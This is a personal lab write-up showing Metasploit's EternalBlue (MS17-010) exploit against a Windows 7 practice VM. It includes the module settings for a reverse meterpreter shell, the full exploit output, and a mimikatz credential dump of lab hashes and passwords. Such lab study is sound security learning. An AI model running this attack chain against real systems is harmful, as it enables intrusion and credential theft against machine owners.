Last time a network problem kept me from reproducing this, so I'm doing it again now.
ms17_010:
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.1.5
rhost => 192.168.1.5
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.1.5:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.5:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
This was a pain, but I figured it out.
Previously it was set to bridged mode, so anything on the same home wifi could ping each other.
But the wifi my laptop is on is a different subnet from my desktop's.
I checked: damn, the desktop is on a wired connection, and that subnet is 80.1,
while the laptop shows 80.2.
So there are three fixes:
- Plug the laptop into the wired network, but I can't do that right now
- Install another Kali VM in VMware and use the same (bridged) setting
- Install WSL on the physical (host) machine and switch the VMware network to NAT
I originally meant to do method 2 but ended up with method 3 by accident.
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.80.128
set lhost 172.24.105.158
set lport 4567
exploit
Below is the run output. Note that the session arrives from 172.24.96.1 rather than from the target's own 192.168.80.128: the target VM sits behind VMware NAT and the handler runs inside WSL, so the reverse connection is NAT'd twice and the listener sees the Windows host's address on the WSL virtual switch.
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.24.105.158   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.80.128
rhost => 192.168.80.128
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.24.105.158
lhost => 172.24.105.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4567
lport => 4567
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 172.24.105.158:4567
[*] 192.168.80.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.80.128:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.80.128:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.80.128:445 - The target is vulnerable.
[*] 192.168.80.128:445 - Connecting to target for exploitation.
[+] 192.168.80.128:445 - Connection established for exploitation.
[+] 192.168.80.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.80.128:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.80.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.80.128:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.80.128:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.80.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.80.128:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.80.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.80.128:445 - Starting non-paged pool grooming
[+] 192.168.80.128:445 - Sending SMBv2 buffers
[+] 192.168.80.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.80.128:445 - Sending final SMBv2 buffers.
[*] 192.168.80.128:445 - Sending last fragment of exploit packet!
[*] 192.168.80.128:445 - Receiving response from exploit packet
[+] 192.168.80.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.80.128:445 - Sending egg to corrupted connection.
[*] 192.168.80.128:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.24.96.1
[*] Meterpreter session 1 opened (172.24.105.158:4567 -> 172.24.96.1:53290 ) at 2022-04-23 22:35:25 +0800
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
Lol, I came in planning to escalate privileges, only to find I was SYSTEM right from the start.
If you want to see SYSTEM privilege escalation, try Viper.
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username       Domain  LM                                NTLM                              SHA1
--------       ------  --                                ----                              ----
Administrator  GOD     edea194d76c77d87840ac10a764c7362  8a963371a63944419ec1adf687bb1be5  343f44056ed02360aead5618dd42e4614b5f70cf
STU1$          GOD                                       0ba7dcdc7f5bef947c985490b99228c1  e5c0f994e94ef2ac378ddb8c784bfb33dda7927a
wdigest credentials
===================
Username       Domain  Password
--------       ------  --------
(null)         (null)  (null)
Administrator  GOD     hongrisec@2019
STU1$          GOD     df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
tspkg credentials
=================
Username       Domain  Password
--------       ------  --------
Administrator  GOD     hongrisec@2019
kerberos credentials
====================
Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  GOD.ORG  hongrisec@2019
stu1$          god.org  df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
stu1$          GOD.ORG  df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
meterpreter >